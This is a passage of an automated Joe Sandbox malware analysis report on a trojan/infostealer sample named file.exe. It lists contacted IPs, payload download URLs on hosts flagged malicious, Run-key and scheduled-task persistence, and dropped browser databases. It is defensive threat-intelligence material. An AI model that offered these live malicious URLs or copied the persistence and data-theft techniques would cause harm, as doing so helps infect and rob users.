                                                                                                                                                                                                                                                                  http://185.215.113.206/c4becf79229cb002.phppfile.exe, 00000000.00000002.2614337983.0000000023C32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    https://cook-rain.sbs/98eeb449c35.exe, 00000019.00000003.2886934243.0000000000DDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      http://.css824db60d2b.exe, 00000018.00000003.2783269577.00000000077F2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                        https://cook-rain.sbs/68eeb449c35.exe, 00000021.00000003.3056107294.00000000011FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                          http://185.215.113.16/steam/random.exew8eeb449c35.exe, 00000019.00000003.3141807375.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                            https://monitor.firefox.comshowBadgeOnlyNotificationpictureinpicture.toggle_enabledError:firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                              https://cook-rain.sbs/38eeb449c35.exe, 00000019.00000003.2940088973.0000000000DED000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2909497390.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2968890217.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2945222453.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2970108810.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                http://mozilla.org/MPL/2.0/.firefox.exe, 0000002B.00000002.3167049287.0000023763EC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3194807647.0000023767148000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000003.3087390284.000002376C7D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3227392661.0000023769A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3245686886.000002376C292000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000003.3037360194.0000023768BB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3251616003.000002376C66E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000003.3136873640.000002376B2D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3241589661.000002376BD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000003.3037360194.0000023768BE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3252774429.000002376C6D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3266889270.0000023A0003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3189037594.00000237661D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000003.3035811213.00000237661E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3251616003.000002376C619000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3189037594.00000237661D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3248219964.000002376C4A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000003.3037360194.0000023768BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3245686886.000002376C281000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3227392661.0000023769AA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3233467913.000002376ACAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                  https://account.bellmedia.caINSTALL_REQUIREBUILTINCERTS40249-e88c401e1b1f2242d9e441c4firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                    https://www.openh264.org/firefox.exe, 0000002B.00000002.3167049287.0000023763EC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpfalse

                                                                                                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                      185.215.113.43
                                                                                                                                                                                                                                                                                      		unknownPortugal
                                                                                                                                                                                                                                                                                      		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                                                                      20.189.173.9
                                                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                                                      		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                      13.107.246.40
                                                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                                                      		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                      162.159.61.3
                                                                                                                                                                                                                                                                                      		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                      142.250.80.1
                                                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                      20.110.205.119
                                                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                                                      		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                      142.250.184.228
                                                                                                                                                                                                                                                                                      		www.google.comUnited States
                                                                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                      18.245.60.107
                                                                                                                                                                                                                                                                                      		sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                                                                      		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                      185.215.113.16
                                                                                                                                                                                                                                                                                      		unknownPortugal
                                                                                                                                                                                                                                                                                      		206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                                                                                                      239.255.255.250
                                                                                                                                                                                                                                                                                      		unknownReserved
                                                                                                                                                                                                                                                                                      		unknownunknownfalse
                                                                                                                                                                                                                                                                                      185.215.113.206
                                                                                                                                                                                                                                                                                      		unknownPortugal
                                                                                                                                                                                                                                                                                      		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                                                                      142.250.186.142
                                                                                                                                                                                                                                                                                      		youtube.comUnited States
                                                                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                      20.75.60.91
                                                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                                                      		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                      142.250.186.100
                                                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                      142.250.186.46
                                                                                                                                                                                                                                                                                      		plus.l.google.comUnited States
                                                                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                      104.70.121.184
                                                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                                                      		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                                                      152.195.19.97
                                                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                                                      		15133EDGECASTUSfalse
                                                                                                                                                                                                                                                                                      104.70.121.146
                                                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                                                      		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                                                      23.200.3.19
                                                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                                                      		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                                                      18.238.49.52
                                                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                                                      		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                      34.117.188.166
                                                                                                                                                                                                                                                                                      		contile.services.mozilla.comUnited States
                                                                                                                                                                                                                                                                                      		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                                                                                                      204.79.197.219
                                                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                                                      		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                      172.64.41.3
                                                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                      31.41.244.11
                                                                                                                                                                                                                                                                                      		unknownRussian Federation
                                                                                                                                                                                                                                                                                      		61974AEROEXPRESS-ASRUfalse
                                                                                                                                                                                                                                                                                      94.245.104.56
                                                                                                                                                                                                                                                                                      		ssl.bingadsedgeextension-prod-europe.azurewebsites.netUnited Kingdom
                                                                                                                                                                                                                                                                                      		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                      34.107.221.82
                                                                                                                                                                                                                                                                                      		prod.detectportal.prod.cloudops.mozgcp.netUnited States
                                                                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                      35.244.181.201
                                                                                                                                                                                                                                                                                      		prod.balrog.prod.cloudops.mozgcp.netUnited States
                                                                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                      188.114.96.3
                                                                                                                                                                                                                                                                                      		cook-rain.sbsEuropean Union
                                                                                                                                                                                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                      34.116.198.130
                                                                                                                                                                                                                                                                                      		home.fvtekk5pn.topUnited States
                                                                                                                                                                                                                                                                                      		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                                                                                                                                                                                                                                                                                      35.190.72.216
                                                                                                                                                                                                                                                                                      		prod.classify-client.prod.webservices.mozgcp.netUnited States
                                                                                                                                                                                                                                                                                      		15169GOOGLEUSfalse

                                                                                                                                                                                                                                                                                      Private

                                                                                                                                                                                                                                                                                      IP
                                                                                                                                                                                                                                                                                      192.168.2.6
                                                                                                                                                                                                                                                                                      127.0.0.1

                                                                                                                                                                                                                                                                                      General Information

                                                                                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                      Analysis ID:1559251
                                                                                                                                                                                                                                                                                      Start date and time:2024-11-20 10:53:11 +01:00
                                                                                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                      Overall analysis duration:0h 20m 36s
                                                                                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                      Number of analysed new started processes analysed:52
                                                                                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                                                                                      Sample name:file.exe
                                                                                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@142/289@86/32
                                                                                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                                                                                      • Successful, ratio: 25%
                                                                                                                                                                                                                                                                                      HCA Information:Failed
                                                                                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                                                                                                      • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.250.186.99, 142.250.186.174, 74.125.206.84, 34.104.35.123, 142.250.186.163, 142.250.185.74, 142.250.186.74, 172.217.18.10, 142.250.186.106, 172.217.16.138, 172.217.18.106, 142.250.185.170, 172.217.23.106, 142.250.185.138, 216.58.206.74, 142.250.184.234, 142.250.186.42, 142.250.186.138, 142.250.185.202, 172.217.16.202, 216.58.212.170, 216.58.206.42, 142.250.185.106, 142.250.186.170, 142.250.185.234, 142.250.184.202, 142.250.181.234, 192.229.221.95, 2.22.50.144, 13.107.42.16, 131.253.33.203, 204.79.197.239, 13.107.21.239, 13.107.6.158, 2.19.126.136, 2.19.126.160, 4.209.164.61, 88.221.110.242, 88.221.110.195, 2.23.209.188, 2.23.209.130, 2.23.209.191, 2.23.209.192, 2.23.209.189, 2.23.209.193, 2.23.209.132, 2.23.209.187, 2.23.209.131, 2.23.209.154, 2.23.209.161, 2.23.209.156, 2.23.209.157, 2.23.209.162, 2.23.209.160, 2.23.209.153, 2.23.209.155, 2.23.209.158, 13.74.129.1, 23.38.98.86, 23.38.98.87, 23.38.98.98, 23.38.98.89, 23.38.98.99, 23.38.98.92, 23.38.98.95, 23.38.98
                                                                                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, aus5.mozilla.org, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, a19.dscg10.akamai.net, clients2.google.com, e86303.dscx.akamaiedge.net, config-edge-skype.l-0007.l-msedge.net, star-azurefd-prod.trafficmanager.net, firefox.settings.services.mozilla.com, learn.microsoft.com.edgekey.net, www.youtube.com, normandy-cdn.services.mozilla.com, www.bing.com, shavar.prod.mozaws.net, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, dyna.wikimedia.org, deff.nelreports.net.akamaized.net, normandy.cdn.mozilla.net, wildcardtlu-ssl.azureedge.net, youtube-ui.l.google.com, reddit.map.fastly.net, edgedl.me.gvt1.com, c.bing.com, clients.l.google.com, www.reddit.com, a-0003.dc-msedge.net, content-signature-2.cdn.mozilla.net, go.microsoft.com, www.bing.com.edgekey.net, push.services.mozilla.com, safebr
                                                                                                                                                                                                                                                                                      • Execution Graph export aborted for target 8eeb449c35.exe, PID 9052 because there are no executed function
                                                                                                                                                                                                                                                                                      • Execution Graph export aborted for target DocumentsKJEGCFBGDH.exe, PID 6736 because it is empty
                                                                                                                                                                                                                                                                                      • Execution Graph export aborted for target skotes.exe, PID 6952 because there are no executed function
                                                                                                                                                                                                                                                                                      • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                      • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                      • VT rate limit hit for: file.exe

                                                                                                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                                                                                      04:54:43API Interceptor39x Sleep call for process: file.exe modified
                                                                                                                                                                                                                                                                                      04:54:59API Interceptor20088741x Sleep call for process: skotes.exe modified
                                                                                                                                                                                                                                                                                      04:55:17API Interceptor207x Sleep call for process: 8eeb449c35.exe modified
                                                                                                                                                                                                                                                                                      04:55:40API Interceptor437382x Sleep call for process: 824db60d2b.exe modified
                                                                                                                                                                                                                                                                                      10:54:54Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      10:55:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 8eeb449c35.exe C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe
                                                                                                                                                                                                                                                                                      10:55:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 241fdb96f6.exe C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe
                                                                                                                                                                                                                                                                                      10:55:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 846d486827.exe C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exe
                                                                                                                                                                                                                                                                                      10:55:44AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fb696bafb5.exe C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exe
                                                                                                                                                                                                                                                                                      10:55:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 8eeb449c35.exe C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe
                                                                                                                                                                                                                                                                                      10:56:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 241fdb96f6.exe C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe
                                                                                                                                                                                                                                                                                      10:56:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 846d486827.exe C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exe
                                                                                                                                                                                                                                                                                      10:56:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run fb696bafb5.exe C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exe
                                                                                                                                                                                                                                                                                      10:56:51Task SchedulerRun new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe

                                                                                                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                                                                                                      IPs

                                                                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                                                                      C:\ProgramData\AKEBFCFI

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.2677421984367483
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:L/2qOB1nxCkM0SA1LyKOMq+8iP5GDHP/0jMVumo:Kq+n0J091LyKOMq+8iP5GLP/0F
                                                                                                                                                                                                                                                                                      MD5:F54B2ECFD5BE38BE45EEEC2FBEE3B2CA
                                                                                                                                                                                                                                                                                      SHA1:5EFE10606259552F14ABD86BE4A7122A7DA6AE2B
                                                                                                                                                                                                                                                                                      SHA-256:430965BD20705E3BA3F4E5F7249A1FAA54DDC1FC7B5732D872C02DAAA47F7FEC
                                                                                                                                                                                                                                                                                      SHA-512:BF9C46F28C00E72FBAF0D662FBB1CCDE6BAD9A347BF3F7DDAFCB1BF21796C64EA7370C518894F3E50570B6A6D430B4DF0C663B4EC9CD6F0716A1743E89253CF2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\CGIDAAAKJJDBGCBFCBGI

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                                                                      MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                                                                      SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                                                                      SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                                                                      SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\DGDBAKKJKKECGDGCAECAKJKKEB

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):5242880
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0357803477377646
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                                                                                                                                      MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                                                                                                                                      SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                                                                                                                                      SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                                                                                                                                      SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\EHJDGHJDBFIJKECAECAF

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\GCFCFCGCGIEHIECAFCFI

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):10237
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.498288591230544
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                                                                                                                                                                                                                                      MD5:0F58C61DE9618A1B53735181E43EE166
                                                                                                                                                                                                                                                                                      SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                                                                                                                                                                                                                                      SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                                                                                                                                                                                                                                      SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

